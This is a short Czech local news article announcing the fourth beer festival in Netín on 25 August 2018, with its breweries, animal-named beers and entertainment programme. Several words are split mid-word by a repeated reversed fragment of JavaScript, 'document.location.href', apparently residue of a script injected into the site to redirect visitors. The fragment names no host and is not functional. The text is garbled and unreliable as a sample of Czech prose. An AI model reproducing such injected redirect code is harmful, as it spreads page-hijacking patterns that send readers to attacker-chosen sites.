Rainbow page separator

V Netíně se lidé už počtvrté pobaví při pivních slavnostech

Sobota, 25. srpna 2018

Netín / Dvacítka pivovarů a asi třicet druhů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točených pivních speciálů. To je ve zkratce hlavní nabídka již čtvrtého ročníku pivních slavností, které se v sobotu 25. srpna uskuteční v Netíně před kulturním domem. Začnou ve 14 hodin, vstup je zdarma.
V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se pořadatelé zaměřili na piva, která mají v názvu zástupce zvířecí říše. Návštěvníci akce nazvané Slavnosti piva tak dostanou možnost ochutnat třeba Ježka, Fénixe, Zubra, Zlatého bažanta, Kozla, Kance i jiné – produkty českých a moravských pivovarů Holba, Li[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovl, Radegast, Krakonoš, Opat, Svijany, Regent a řada dalších.
Kromě ochutnávky piv bude připravený doprovodný program pro děti i dospělé. Zatímco nejmenší návštěvníci budou moci využít skákací hrad se skluzavkou, jejich rodiče zase čekají různé soutěže s pivní tematikou. Odpoledne se budou z reproduk[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů linout nejznámější české „pivní“ písničky, večer přijde na řadu taneční zábava s kapelami Renovace a Accord.